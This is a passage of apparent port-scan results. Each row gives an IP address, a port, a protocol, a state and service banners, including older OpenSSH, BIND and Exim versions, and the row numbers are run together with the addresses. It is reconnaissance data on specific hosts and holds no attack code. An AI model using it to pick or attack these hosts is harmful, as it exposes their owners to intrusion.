578334.253.89.155 520 tcp efs closed
578434.253.89.155 520 udp route unknown
578534.253.89.155 2049 tcp nfs closed
578634.253.89.155 2049 udp nfs unknown
578737.1.207.121 53 tcp domain open ISC BIND 9.9.4 RedHat Enterprise Linux 7
578837.1.207.121 53 udp domain open ISC BIND 9.9.4 RedHat Enterprise Linux 7
578937.1.207.121 67 tcp dhcps filtered
579037.1.207.121 67 udp dhcps unknown
579137.1.207.121 68 tcp dhcpc filtered
579237.1.207.121 68 udp dhcpc filtered
579337.1.207.121 69 tcp tftp filtered
579437.1.207.121 69 udp tftp unknown
579537.1.207.121 88 tcp kerberos-sec filtered
579637.1.207.121 88 udp kerberos-sec filtered
579737.1.207.121 123 tcp ntp filtered
579837.1.207.121 123 udp ntp unknown
579937.1.207.121 137 tcp netbios-ns filtered
580037.1.207.121 137 udp netbios-ns unknown
580137.1.207.121 138 tcp netbios-dgm filtered
580237.1.207.121 138 udp netbios-dgm unknown
580337.1.207.121 139 tcp netbios-ssn filtered
580437.1.207.121 139 udp netbios-ssn unknown
580537.1.207.121 161 tcp snmp filtered
580637.1.207.121 161 udp snmp unknown
580737.1.207.121 162 tcp snmptrap filtered
580837.1.207.121 162 udp snmptrap unknown
580937.1.207.121 389 tcp ldap filtered
581037.1.207.121 389 udp ldap unknown
581137.1.207.121 520 tcp efs filtered
581237.1.207.121 520 udp route unknown
581337.1.207.121 2049 tcp nfs filtered
581437.1.207.121 2049 udp nfs filtered
581543.245.223.4 80 tcp http open nginx
581643.245.223.4 443 tcp ssl/http open nginx
581743.245.223.4 32022 tcp ssh open OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
581845.60.47.218 25 tcp http open Incapsula CDN httpd
581945.60.47.218 53 tcp domain open
582045.60.47.218 53 udp domain open
582145.60.47.218 67 udp dhcps unknown
582245.60.47.218 68 udp dhcpc unknown
582345.60.47.218 69 udp tftp unknown
582445.60.47.218 80 tcp http open Incapsula CDN httpd
582545.60.47.218 81 tcp http open Incapsula CDN httpd
582645.60.47.218 85 tcp http open Incapsula CDN httpd
582745.60.47.218 88 tcp http open Incapsula CDN httpd
582845.60.47.218 88 udp kerberos-sec unknown
582945.60.47.218 123 udp ntp unknown
583045.60.47.218 137 udp netbios-ns unknown
583145.60.47.218 138 udp netbios-dgm unknown
583245.60.47.218 139 udp netbios-ssn unknown
583345.60.47.218 161 udp snmp unknown
583445.60.47.218 162 udp snmptrap unknown
583545.60.47.218 389 tcp ssl/http open Incapsula CDN httpd
583645.60.47.218 389 udp ldap unknown
583745.60.47.218 443 tcp ssl/http open Incapsula CDN httpd
583845.60.47.218 444 tcp ssl/http open Incapsula CDN httpd
583945.60.47.218 445 tcp ssl/http open Incapsula CDN httpd
584045.60.47.218 446 tcp http open Incapsula CDN httpd
584145.60.47.218 520 udp route unknown
584245.60.47.218 587 tcp http open Incapsula CDN httpd
584345.60.47.218 631 tcp http open Incapsula CDN httpd
584445.60.47.218 888 tcp http open Incapsula CDN httpd
584545.60.47.218 995 tcp ssl/http open Incapsula CDN httpd
584645.60.47.218 998 tcp ssl/http open Incapsula CDN httpd
584745.60.47.218 999 tcp http open Incapsula CDN httpd
584845.60.47.218 1000 tcp http open Incapsula CDN httpd
584945.60.47.218 1024 tcp http open Incapsula CDN httpd
585045.60.47.218 1103 tcp http open Incapsula CDN httpd
585145.60.47.218 1234 tcp http open Incapsula CDN httpd
585245.60.47.218 1433 tcp http open Incapsula CDN httpd
585345.60.47.218 1494 tcp http open Incapsula CDN httpd
585445.60.47.218 2000 tcp ssl/http open Incapsula CDN httpd
585545.60.47.218 2001 tcp http open Incapsula CDN httpd
585645.60.47.218 2049 tcp http open Incapsula CDN httpd
585745.60.47.218 2049 udp nfs unknown
585845.60.47.218 2067 tcp http open Incapsula CDN httpd
585945.60.47.218 2100 tcp ssl/http open Incapsula CDN httpd
586045.60.47.218 2222 tcp http open Incapsula CDN httpd
586145.60.47.218 2598 tcp http open Incapsula CDN httpd
586245.60.47.218 3000 tcp http open Incapsula CDN httpd
586345.60.47.218 3050 tcp http open Incapsula CDN httpd
586445.60.47.218 3057 tcp http open Incapsula CDN httpd
586545.60.47.218 3299 tcp http open Incapsula CDN httpd
586645.60.47.218 3306 tcp ssl/http open Incapsula CDN httpd
586745.60.47.218 3333 tcp http open Incapsula CDN httpd
586845.60.47.218 3389 tcp ssl/http open Incapsula CDN httpd
586945.60.47.218 3500 tcp http open Incapsula CDN httpd
587045.60.47.218 3790 tcp http open Incapsula CDN httpd
587145.60.47.218 4000 tcp http open Incapsula CDN httpd
587245.60.47.218 4444 tcp ssl/http open Incapsula CDN httpd
587345.60.47.218 4445 tcp ssl/http open Incapsula CDN httpd
587445.60.47.218 4848 tcp http open Incapsula CDN httpd
587545.60.47.218 5000 tcp http open Incapsula CDN httpd
587645.60.47.218 5009 tcp http open Incapsula CDN httpd
587745.60.47.218 5051 tcp ssl/http open Incapsula CDN httpd
587845.60.47.218 5060 tcp ssl/http open Incapsula CDN httpd
587945.60.47.218 5061 tcp ssl/http open Incapsula CDN httpd
588045.60.47.218 5227 tcp ssl/http open Incapsula CDN httpd
588145.60.47.218 5247 tcp ssl/http open Incapsula CDN httpd
588245.60.47.218 5250 tcp ssl/http open Incapsula CDN httpd
588345.60.47.218 5555 tcp http open Incapsula CDN httpd
588445.60.47.218 5900 tcp http open Incapsula CDN httpd
588545.60.47.218 5901 tcp ssl/http open Incapsula CDN httpd
588645.60.47.218 5902 tcp ssl/http open Incapsula CDN httpd
588745.60.47.218 5903 tcp ssl/http open Incapsula CDN httpd
588845.60.47.218 5904 tcp ssl/http open Incapsula CDN httpd
588945.60.47.218 5905 tcp ssl/http open Incapsula CDN httpd
589045.60.47.218 5906 tcp ssl/http open Incapsula CDN httpd
589145.60.47.218 5907 tcp ssl/http open Incapsula CDN httpd
589245.60.47.218 5908 tcp ssl/http open Incapsula CDN httpd
589345.60.47.218 5909 tcp ssl/http open Incapsula CDN httpd
589445.60.47.218 5910 tcp ssl/http open Incapsula CDN httpd
589545.60.47.218 5920 tcp ssl/http open Incapsula CDN httpd
589645.60.47.218 5984 tcp ssl/http open Incapsula CDN httpd
589745.60.47.218 5985 tcp http open Incapsula CDN httpd
589845.60.47.218 5986 tcp ssl/http open Incapsula CDN httpd
589945.60.47.218 5999 tcp ssl/http open Incapsula CDN httpd
590045.60.47.218 6000 tcp http open Incapsula CDN httpd
590145.60.47.218 6060 tcp http open Incapsula CDN httpd
590245.60.47.218 6161 tcp http open Incapsula CDN httpd
590345.60.47.218 6379 tcp http open Incapsula CDN httpd
590445.60.47.218 6661 tcp ssl/http open Incapsula CDN httpd
590545.60.47.218 6789 tcp http open Incapsula CDN httpd
590645.60.47.218 7000 tcp ssl/http open Incapsula CDN httpd
590745.60.47.218 7001 tcp http open Incapsula CDN httpd
590845.60.47.218 7021 tcp http open Incapsula CDN httpd
590945.60.47.218 7071 tcp ssl/http open Incapsula CDN httpd
591045.60.47.218 7080 tcp http open Incapsula CDN httpd
591145.60.47.218 7272 tcp ssl/http open Incapsula CDN httpd
591245.60.47.218 7443 tcp ssl/http open Incapsula CDN httpd
591345.60.47.218 7700 tcp http open Incapsula CDN httpd
591445.60.47.218 7777 tcp http open Incapsula CDN httpd
591545.60.47.218 7778 tcp http open Incapsula CDN httpd
591645.60.47.218 8000 tcp http open Incapsula CDN httpd
591745.60.47.218 8001 tcp http open Incapsula CDN httpd
591845.60.47.218 8008 tcp http open Incapsula CDN httpd
591945.60.47.218 8014 tcp http open Incapsula CDN httpd
592045.60.47.218 8020 tcp http open Incapsula CDN httpd
592145.60.47.218 8023 tcp http open Incapsula CDN httpd
592245.60.47.218 8028 tcp http open Incapsula CDN httpd
592345.60.47.218 8030 tcp http open Incapsula CDN httpd
592445.60.47.218 8050 tcp http open Incapsula CDN httpd
592545.60.47.218 8051 tcp http open Incapsula CDN httpd
592645.60.47.218 8080 tcp http open Incapsula CDN httpd
592745.60.47.218 8081 tcp http open Incapsula CDN httpd
592845.60.47.218 8082 tcp http open Incapsula CDN httpd
592945.60.47.218 8085 tcp http open Incapsula CDN httpd
593045.60.47.218 8086 tcp http open Incapsula CDN httpd
593145.60.47.218 8087 tcp http open Incapsula CDN httpd
593245.60.47.218 8088 tcp http open Incapsula CDN httpd
593345.60.47.218 8090 tcp http open Incapsula CDN httpd
593445.60.47.218 8091 tcp http open Incapsula CDN httpd
593545.60.47.218 8095 tcp http open Incapsula CDN httpd
593645.60.47.218 8101 tcp http open Incapsula CDN httpd
593745.60.47.218 8161 tcp http open Incapsula CDN httpd
593845.60.47.218 8180 tcp http open Incapsula CDN httpd
593945.60.47.218 8222 tcp http open Incapsula CDN httpd
594045.60.47.218 8333 tcp http open Incapsula CDN httpd
594145.60.47.218 8443 tcp ssl/http open Incapsula CDN httpd
594245.60.47.218 8444 tcp http open Incapsula CDN httpd
594345.60.47.218 8445 tcp http open Incapsula CDN httpd
594445.60.47.218 8503 tcp ssl/http open Incapsula CDN httpd
594545.60.47.218 8686 tcp http open Incapsula CDN httpd
594645.60.47.218 8701 tcp ssl/http open Incapsula CDN httpd
594745.60.47.218 8787 tcp http open Incapsula CDN httpd
594845.60.47.218 8800 tcp http open Incapsula CDN httpd
594945.60.47.218 8812 tcp http open Incapsula CDN httpd
595045.60.47.218 8834 tcp http open Incapsula CDN httpd
595145.60.47.218 8880 tcp http open Incapsula CDN httpd
595245.60.47.218 8888 tcp http open Incapsula CDN httpd
595345.60.47.218 8889 tcp http open Incapsula CDN httpd
595445.60.47.218 8890 tcp http open Incapsula CDN httpd
595545.60.47.218 8899 tcp http open Incapsula CDN httpd
595645.60.47.218 8901 tcp http open Incapsula CDN httpd
595745.60.47.218 8902 tcp http open Incapsula CDN httpd
595845.60.47.218 8999 tcp http open Incapsula CDN httpd
595945.60.47.218 9000 tcp http open Incapsula CDN httpd
596045.60.47.218 9001 tcp http open Incapsula CDN httpd
596145.60.47.218 9002 tcp http open Incapsula CDN httpd
596245.60.47.218 9003 tcp http open Incapsula CDN httpd
596345.60.47.218 9004 tcp http open Incapsula CDN httpd
596445.60.47.218 9005 tcp http open Incapsula CDN httpd
596545.60.47.218 9010 tcp http open Incapsula CDN httpd
596645.60.47.218 9050 tcp http open Incapsula CDN httpd
596745.60.47.218 9080 tcp http open Incapsula CDN httpd
596845.60.47.218 9081 tcp ssl/http open Incapsula CDN httpd
596945.60.47.218 9084 tcp http open Incapsula CDN httpd
597045.60.47.218 9090 tcp http open Incapsula CDN httpd
597145.60.47.218 9099 tcp http open Incapsula CDN httpd
597245.60.47.218 9100 tcp jetdirect open
597345.60.47.218 9111 tcp http open Incapsula CDN httpd
597445.60.47.218 9200 tcp http open Incapsula CDN httpd
597545.60.47.218 9300 tcp http open Incapsula CDN httpd
597645.60.47.218 9500 tcp http open Incapsula CDN httpd
597745.60.47.218 9711 tcp ssl/http open Incapsula CDN httpd
597845.60.47.218 9991 tcp http open Incapsula CDN httpd
597945.60.47.218 9999 tcp http open Incapsula CDN httpd
598045.60.47.218 10000 tcp http open Incapsula CDN httpd
598145.60.47.218 10001 tcp http open Incapsula CDN httpd
598245.60.47.218 10008 tcp http open Incapsula CDN httpd
598345.60.47.218 10443 tcp ssl/http open Incapsula CDN httpd
598445.60.47.218 11001 tcp ssl/http open Incapsula CDN httpd
598545.60.47.218 12174 tcp http open Incapsula CDN httpd
598645.60.47.218 12203 tcp http open Incapsula CDN httpd
598745.60.47.218 12221 tcp http open Incapsula CDN httpd
598845.60.47.218 12345 tcp http open Incapsula CDN httpd
598945.60.47.218 12397 tcp http open Incapsula CDN httpd
599045.60.47.218 12401 tcp http open Incapsula CDN httpd
599145.60.47.218 14330 tcp http open Incapsula CDN httpd
599245.60.47.218 16000 tcp http open Incapsula CDN httpd
599345.60.47.218 20000 tcp http open Incapsula CDN httpd
599445.60.47.218 20010 tcp ssl/http open Incapsula CDN httpd
599545.60.47.218 25000 tcp ssl/http open Incapsula CDN httpd
599645.60.47.218 30000 tcp http open Incapsula CDN httpd
599745.60.47.218 44334 tcp ssl/http open Incapsula CDN httpd
599845.60.47.218 50000 tcp http open Incapsula CDN httpd
599945.60.47.218 50001 tcp ssl/http open Incapsula CDN httpd
600045.60.47.218 50050 tcp ssl/http open Incapsula CDN httpd
600145.88.202.111 22 tcp ssh open OpenSSH 7.9p1 Debian 10+deb10u1 protocol 2.0
600245.88.202.111 53 tcp domain open PowerDNS Authoritative Server 4.2.0-rc3
600345.88.202.111 53 udp domain open PowerDNS Authoritative Server 4.2.0-rc3
600445.88.202.111 67 tcp dhcps closed
600545.88.202.111 67 udp dhcps unknown
600645.88.202.111 68 tcp dhcpc closed
600745.88.202.111 68 udp dhcpc unknown
600845.88.202.111 69 tcp tftp closed
600945.88.202.111 69 udp tftp closed
601045.88.202.111 80 tcp http open nginx
601145.88.202.111 88 tcp kerberos-sec closed
601245.88.202.111 88 udp kerberos-sec unknown
601345.88.202.111 123 tcp ntp closed
601445.88.202.111 123 udp ntp closed
601545.88.202.111 137 tcp netbios-ns closed
601645.88.202.111 137 udp netbios-ns filtered
601745.88.202.111 138 tcp netbios-dgm closed
601845.88.202.111 138 udp netbios-dgm filtered
601945.88.202.111 139 tcp netbios-ssn closed
602045.88.202.111 139 udp netbios-ssn closed
602145.88.202.111 161 tcp snmp closed
602245.88.202.111 161 udp snmp closed
602345.88.202.111 162 tcp snmptrap closed
602445.88.202.111 162 udp snmptrap closed
602545.88.202.111 179 tcp bgp filtered
602645.88.202.111 389 tcp ldap closed
602745.88.202.111 389 udp ldap unknown
602845.88.202.111 443 tcp ssl/http open nginx
602945.88.202.111 520 tcp efs closed
603045.88.202.111 520 udp route unknown
603145.88.202.111 2049 tcp nfs closed
603245.88.202.111 2049 udp nfs closed
603345.88.202.111 10050 tcp tcpwrapped open
603445.239.108.252 53 tcp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
603545.239.108.252 53 udp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
603645.239.108.252 67 tcp dhcps filtered
603745.239.108.252 67 udp dhcps unknown
603845.239.108.252 68 tcp dhcpc filtered
603945.239.108.252 68 udp dhcpc unknown
604045.239.108.252 69 tcp tftp filtered
604145.239.108.252 69 udp tftp unknown
604245.239.108.252 88 tcp kerberos-sec filtered
604345.239.108.252 88 udp kerberos-sec unknown
604445.239.108.252 123 tcp ntp filtered
604545.239.108.252 123 udp ntp unknown
604645.239.108.252 137 tcp netbios-ns filtered
604745.239.108.252 137 udp netbios-ns unknown
604845.239.108.252 138 tcp netbios-dgm filtered
604945.239.108.252 138 udp netbios-dgm unknown
605045.239.108.252 139 tcp netbios-ssn filtered
605145.239.108.252 139 udp netbios-ssn unknown
605245.239.108.252 161 tcp snmp filtered
605345.239.108.252 161 udp snmp unknown
605445.239.108.252 162 tcp snmptrap filtered
605545.239.108.252 162 udp snmptrap unknown
605645.239.108.252 389 tcp ldap filtered
605745.239.108.252 389 udp ldap unknown
605845.239.108.252 520 tcp efs filtered
605945.239.108.252 520 udp route unknown
606045.239.108.252 2049 tcp nfs filtered
606145.239.108.252 2049 udp nfs unknown
606252.1.2.24 53 tcp domain filtered
606352.1.2.24 53 udp domain unknown
606452.1.2.24 67 tcp dhcps filtered
606552.1.2.24 67 udp dhcps unknown
606652.1.2.24 68 tcp dhcpc filtered
606752.1.2.24 68 udp dhcpc unknown
606852.1.2.24 69 tcp tftp filtered
606952.1.2.24 69 udp tftp unknown
607052.1.2.24 80 tcp http open Apache httpd 2.4.29 (Ubuntu)
607152.1.2.24 88 tcp kerberos-sec filtered
607252.1.2.24 88 udp kerberos-sec unknown
607352.1.2.24 123 tcp ntp filtered
607452.1.2.24 123 udp ntp unknown
607552.1.2.24 137 tcp netbios-ns filtered
607652.1.2.24 137 udp netbios-ns unknown
607752.1.2.24 138 tcp netbios-dgm filtered
607852.1.2.24 138 udp netbios-dgm unknown
607952.1.2.24 139 tcp netbios-ssn filtered
608052.1.2.24 139 udp netbios-ssn unknown
608152.1.2.24 161 tcp snmp filtered
608252.1.2.24 161 udp snmp unknown
608352.1.2.24 162 tcp snmptrap filtered
608452.1.2.24 162 udp snmptrap unknown
608552.1.2.24 389 tcp ldap filtered
608652.1.2.24 389 udp ldap unknown
608752.1.2.24 443 tcp ssl/http open Apache httpd 2.4.29 (Ubuntu)
608852.1.2.24 520 tcp efs filtered
608952.1.2.24 520 udp route unknown
609052.1.2.24 2049 tcp nfs filtered
609152.1.2.24 2049 udp nfs unknown
609252.1.174.10 53 tcp domain filtered
609352.1.174.10 53 udp domain unknown
609452.1.174.10 67 tcp dhcps filtered
609552.1.174.10 67 udp dhcps unknown
609652.1.174.10 68 tcp dhcpc filtered
609752.1.174.10 68 udp dhcpc unknown
609852.1.174.10 69 tcp tftp filtered
609952.1.174.10 69 udp tftp unknown
610052.1.174.10 80 tcp http open nginx
610152.1.174.10 88 tcp kerberos-sec filtered
610252.1.174.10 88 udp kerberos-sec unknown
610352.1.174.10 123 tcp ntp filtered
610452.1.174.10 123 udp ntp unknown
610552.1.174.10 137 tcp netbios-ns filtered
610652.1.174.10 137 udp netbios-ns unknown
610752.1.174.10 138 tcp netbios-dgm filtered
610852.1.174.10 138 udp netbios-dgm unknown
610952.1.174.10 139 tcp netbios-ssn filtered
611052.1.174.10 139 udp netbios-ssn unknown
611152.1.174.10 161 tcp snmp filtered
611252.1.174.10 161 udp snmp unknown
611352.1.174.10 162 tcp snmptrap filtered
611452.1.174.10 162 udp snmptrap unknown
611552.1.174.10 389 tcp ldap filtered
611652.1.174.10 389 udp ldap unknown
611752.1.174.10 443 tcp ssl/http open nginx
611852.1.174.10 520 tcp efs filtered
611952.1.174.10 520 udp route unknown
612052.1.174.10 2049 tcp nfs filtered
612152.1.174.10 2049 udp nfs unknown
612252.30.54.73 53 tcp domain closed
612352.30.54.73 53 udp domain unknown
612452.30.54.73 67 tcp dhcps closed
612552.30.54.73 67 udp dhcps unknown
612652.30.54.73 68 tcp dhcpc closed
612752.30.54.73 68 udp dhcpc unknown
612852.30.54.73 69 tcp tftp closed
612952.30.54.73 69 udp tftp unknown
613052.30.54.73 80 tcp http open nginx
613152.30.54.73 88 tcp kerberos-sec closed
613252.30.54.73 88 udp kerberos-sec unknown
613352.30.54.73 123 tcp ntp closed
613452.30.54.73 123 udp ntp unknown
613552.30.54.73 137 tcp netbios-ns closed
613652.30.54.73 137 udp netbios-ns unknown
613752.30.54.73 138 tcp netbios-dgm closed
613852.30.54.73 138 udp netbios-dgm unknown
613952.30.54.73 139 tcp netbios-ssn closed
614052.30.54.73 139 udp netbios-ssn unknown
614152.30.54.73 161 tcp snmp closed
614252.30.54.73 161 udp snmp unknown
614352.30.54.73 162 tcp snmptrap closed
614452.30.54.73 162 udp snmptrap unknown
614552.30.54.73 389 tcp ldap closed
614652.30.54.73 389 udp ldap unknown
614752.30.54.73 443 tcp ssl/http open nginx
614852.30.54.73 520 tcp efs closed
614952.30.54.73 520 udp route unknown
615052.30.54.73 2049 tcp nfs closed
615152.30.54.73 2049 udp nfs unknown
615252.52.234.222 53 tcp domain filtered
615352.52.234.222 53 udp domain unknown
615452.52.234.222 67 tcp dhcps filtered
615552.52.234.222 67 udp dhcps unknown
615652.52.234.222 68 tcp dhcpc filtered
615752.52.234.222 68 udp dhcpc unknown
615852.52.234.222 69 tcp tftp filtered
615952.52.234.222 69 udp tftp unknown
616052.52.234.222 88 tcp kerberos-sec filtered
616152.52.234.222 88 udp kerberos-sec unknown
616252.52.234.222 123 tcp ntp filtered
616352.52.234.222 123 udp ntp unknown
616452.52.234.222 137 tcp netbios-ns filtered
616552.52.234.222 137 udp netbios-ns unknown
616652.52.234.222 138 tcp netbios-dgm filtered
616752.52.234.222 138 udp netbios-dgm unknown
616852.52.234.222 139 tcp netbios-ssn filtered
616952.52.234.222 139 udp netbios-ssn unknown
617052.52.234.222 161 tcp snmp filtered
617152.52.234.222 161 udp snmp unknown
617252.52.234.222 162 tcp snmptrap filtered
617352.52.234.222 162 udp snmptrap unknown
617452.52.234.222 389 tcp ldap filtered
617552.52.234.222 389 udp ldap unknown
617652.52.234.222 520 tcp efs filtered
617752.52.234.222 520 udp route unknown
617852.52.234.222 2049 tcp nfs filtered
617952.52.234.222 2049 udp nfs unknown
618054.72.57.25 53 tcp domain closed
618154.72.57.25 53 udp domain unknown
618254.72.57.25 67 tcp dhcps closed
618354.72.57.25 67 udp dhcps unknown
618454.72.57.25 68 tcp dhcpc closed
618554.72.57.25 68 udp dhcpc unknown
618654.72.57.25 69 tcp tftp closed
618754.72.57.25 69 udp tftp unknown
618854.72.57.25 80 tcp http open nginx
618954.72.57.25 88 tcp kerberos-sec closed
619054.72.57.25 88 udp kerberos-sec unknown
619154.72.57.25 123 tcp ntp closed
619254.72.57.25 123 udp ntp unknown
619354.72.57.25 137 tcp netbios-ns closed
619454.72.57.25 137 udp netbios-ns unknown
619554.72.57.25 138 tcp netbios-dgm closed
619654.72.57.25 138 udp netbios-dgm unknown
619754.72.57.25 139 tcp netbios-ssn closed
619854.72.57.25 139 udp netbios-ssn unknown
619954.72.57.25 161 tcp snmp closed
620054.72.57.25 161 udp snmp unknown
620154.72.57.25 162 tcp snmptrap closed
620254.72.57.25 162 udp snmptrap unknown
620354.72.57.25 389 tcp ldap closed
620454.72.57.25 389 udp ldap unknown
620554.72.57.25 443 tcp ssl/http open nginx
620654.72.57.25 520 tcp efs closed
620754.72.57.25 520 udp route unknown
620854.72.57.25 2049 tcp nfs closed
620954.72.57.25 2049 udp nfs unknown
621054.85.59.109 53 tcp domain filtered
621154.85.59.109 53 udp domain unknown
621254.85.59.109 67 tcp dhcps filtered
621354.85.59.109 67 udp dhcps unknown
621454.85.59.109 68 tcp dhcpc filtered
621554.85.59.109 68 udp dhcpc unknown
621654.85.59.109 69 tcp tftp filtered
621754.85.59.109 69 udp tftp unknown
621854.85.59.109 80 tcp http open nginx
621954.85.59.109 88 tcp kerberos-sec filtered
622054.85.59.109 88 udp kerberos-sec unknown
622154.85.59.109 123 tcp ntp filtered
622254.85.59.109 123 udp ntp unknown
622354.85.59.109 137 tcp netbios-ns filtered
622454.85.59.109 137 udp netbios-ns unknown
622554.85.59.109 138 tcp netbios-dgm filtered
622654.85.59.109 138 udp netbios-dgm unknown
622754.85.59.109 139 tcp netbios-ssn filtered
622854.85.59.109 139 udp netbios-ssn unknown
622954.85.59.109 161 tcp snmp filtered
623054.85.59.109 161 udp snmp unknown
623154.85.59.109 162 tcp snmptrap filtered
623254.85.59.109 162 udp snmptrap unknown
623354.85.59.109 389 tcp ldap filtered
623454.85.59.109 389 udp ldap unknown
623554.85.59.109 443 tcp ssl/http open nginx
623654.85.59.109 520 tcp efs filtered
623754.85.59.109 520 udp route unknown
623854.85.59.109 2049 tcp nfs filtered
623954.85.59.109 2049 udp nfs unknown
624054.194.134.190 53 tcp domain closed
624154.194.134.190 53 udp domain unknown
624254.194.134.190 67 tcp dhcps closed
624354.194.134.190 67 udp dhcps unknown
624454.194.134.190 68 tcp dhcpc closed
624554.194.134.190 68 udp dhcpc unknown
624654.194.134.190 69 tcp tftp closed
624754.194.134.190 69 udp tftp unknown
624854.194.134.190 80 tcp http open nginx
624954.194.134.190 88 tcp kerberos-sec closed
625054.194.134.190 88 udp kerberos-sec unknown
625154.194.134.190 123 tcp ntp closed
625254.194.134.190 123 udp ntp unknown
625354.194.134.190 137 tcp netbios-ns closed
625454.194.134.190 137 udp netbios-ns unknown
625554.194.134.190 138 tcp netbios-dgm closed
625654.194.134.190 138 udp netbios-dgm unknown
625754.194.134.190 139 tcp netbios-ssn closed
625854.194.134.190 139 udp netbios-ssn unknown
625954.194.134.190 161 tcp snmp closed
626054.194.134.190 161 udp snmp unknown
626154.194.134.190 162 tcp snmptrap closed
626254.194.134.190 162 udp snmptrap unknown
626354.194.134.190 389 tcp ldap closed
626454.194.134.190 389 udp ldap unknown
626554.194.134.190 443 tcp ssl/http open nginx
626654.194.134.190 520 tcp efs closed
626754.194.134.190 520 udp route unknown
626854.194.134.190 2049 tcp nfs closed
626954.194.134.190 2049 udp nfs unknown
627064.69.94.253 53 tcp domain filtered
627164.69.94.253 53 udp domain unknown
627264.69.94.253 67 tcp dhcps filtered
627364.69.94.253 67 udp dhcps unknown
627464.69.94.253 68 tcp dhcpc filtered
627564.69.94.253 68 udp dhcpc unknown
627664.69.94.253 69 tcp tftp filtered
627764.69.94.253 69 udp tftp unknown
627864.69.94.253 88 tcp kerberos-sec filtered
627964.69.94.253 88 udp kerberos-sec unknown
628064.69.94.253 123 tcp ntp filtered
628164.69.94.253 123 udp ntp unknown
628264.69.94.253 137 tcp netbios-ns filtered
628364.69.94.253 137 udp netbios-ns unknown
628464.69.94.253 138 tcp netbios-dgm filtered
628564.69.94.253 138 udp netbios-dgm unknown
628664.69.94.253 139 tcp netbios-ssn filtered
628764.69.94.253 139 udp netbios-ssn unknown
628864.69.94.253 161 tcp snmp filtered
628964.69.94.253 161 udp snmp unknown
629064.69.94.253 162 tcp snmptrap filtered
629164.69.94.253 162 udp snmptrap unknown
629264.69.94.253 389 tcp ldap filtered
629364.69.94.253 389 udp ldap unknown
629464.69.94.253 520 tcp efs filtered
629564.69.94.253 520 udp route unknown
629664.69.94.253 2049 tcp nfs filtered
629764.69.94.253 2049 udp nfs unknown
629869.163.233.4 21 tcp ftp open 220 DreamHost FTP Server\x0d\x0a
629969.163.233.4 22 tcp ssh open SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.13
630069.163.233.4 25 tcp open
630169.163.233.4 53 tcp domain closed
630269.163.233.4 53 udp domain unknown
630369.163.233.4 67 tcp dhcps closed
630469.163.233.4 67 udp dhcps closed
630569.163.233.4 68 tcp dhcpc closed
630669.163.233.4 68 udp dhcpc unknown
630769.163.233.4 69 tcp tftp closed
630869.163.233.4 69 udp tftp closed
630969.163.233.4 88 tcp kerberos-sec closed
631069.163.233.4 88 udp kerberos-sec unknown
631169.163.233.4 123 tcp ntp closed
631269.163.233.4 123 udp ntp unknown
631369.163.233.4 137 tcp netbios-ns closed
631469.163.233.4 137 udp netbios-ns closed
631569.163.233.4 138 tcp netbios-dgm closed
631669.163.233.4 138 udp netbios-dgm closed
631769.163.233.4 139 tcp netbios-ssn closed
631869.163.233.4 139 udp netbios-ssn unknown
631969.163.233.4 161 tcp snmp closed
632069.163.233.4 161 udp snmp closed
632169.163.233.4 162 tcp snmptrap closed
632269.163.233.4 162 udp snmptrap closed
632369.163.233.4 389 tcp ldap closed
632469.163.233.4 389 udp ldap unknown
632569.163.233.4 520 tcp efs closed
632669.163.233.4 520 udp route closed
632769.163.233.4 2049 tcp nfs closed
632869.163.233.4 2049 udp nfs unknown
632974.117.180.192 21 tcp ftp filtered 220 Hello.\x0d\x0a
633074.117.180.192 22 tcp ssh filtered
633174.117.180.192 25 tcp smtp filtered
633274.117.180.192 53 tcp domain closed
633374.117.180.192 53 udp domain unknown
633474.117.180.192 67 tcp dhcps closed
633574.117.180.192 67 udp dhcps unknown
633674.117.180.192 68 tcp dhcpc closed
633774.117.180.192 68 udp dhcpc closed
633874.117.180.192 69 tcp tftp closed
633974.117.180.192 69 udp tftp closed
634074.117.180.192 80 tcp http filtered
634174.117.180.192 88 tcp kerberos-sec closed
634274.117.180.192 88 udp kerberos-sec closed
634374.117.180.192 110 tcp pop3 filtered
634474.117.180.192 111 tcp rpcbind filtered
634574.117.180.192 123 tcp ntp closed
634674.117.180.192 123 udp ntp unknown
634774.117.180.192 137 tcp netbios-ns closed
634874.117.180.192 137 udp netbios-ns closed
634974.117.180.192 138 tcp netbios-dgm closed
635074.117.180.192 138 udp netbios-dgm unknown
635174.117.180.192 139 tcp netbios-ssn closed
635274.117.180.192 139 udp netbios-ssn unknown
635374.117.180.192 143 tcp imap filtered
635474.117.180.192 161 tcp snmp closed
635574.117.180.192 161 udp snmp closed
635674.117.180.192 162 tcp snmptrap closed
635774.117.180.192 162 udp snmptrap unknown
635874.117.180.192 323 tcp rpki-rtr filtered
635974.117.180.192 389 tcp ldap closed
636074.117.180.192 389 udp ldap closed
636174.117.180.192 443 tcp https filtered
636274.117.180.192 465 tcp ssl/smtp open Exim smtpd 4.92.3
636374.117.180.192 520 tcp efs closed
636474.117.180.192 520 udp route unknown
636574.117.180.192 587 tcp submission filtered
636674.117.180.192 873 tcp rsync filtered
636774.117.180.192 993 tcp imaps filtered
636874.117.180.192 995 tcp pop3s filtered
636974.117.180.192 2049 tcp nfs closed
637074.117.180.192 2049 udp nfs closed
637174.117.180.192 2525 tcp smtp open Exim smtpd
637274.117.180.192 3306 tcp mysql filtered
637374.117.180.192 4949 tcp tcpwrapped open
637474.117.180.192 5666 tcp tcpwrapped open
637574.117.180.192 6380 tcp filtered
637674.117.180.192 9306 tcp sphinx-search open Sphinx Search daemon 2.1.5-id64-release
637774.117.180.192 11211 tcp memcache filtered
637882.94.222.131 53 udp domain unknown
637982.94.222.131 67 udp dhcps unknown
638082.94.222.131 68 udp dhcpc unknown
638182.94.222.131 69 udp tftp unknown
638282.94.222.131 88 udp kerberos-sec unknown
638382.94.222.131 123 udp ntp unknown
638482.94.222.131 137 udp netbios-ns unknown
638582.94.222.131 138 udp netbios-dgm unknown
638682.94.222.131 139 udp netbios-ssn unknown
638782.94.222.131 161 udp snmp unknown
638882.94.222.131 162 udp snmptrap unknown
638982.94.222.131 389 udp ldap unknown
639082.94.222.131 520 udp route unknown
639182.94.222.131 2049 udp nfs unknown
639292.123.250.35 53 tcp domain closed
639392.123.250.35 53 udp domain closed
639492.123.250.35 67 tcp dhcps filtered
639592.123.250.35 67 udp dhcps unknown
639692.123.250.35 68 tcp dhcpc filtered
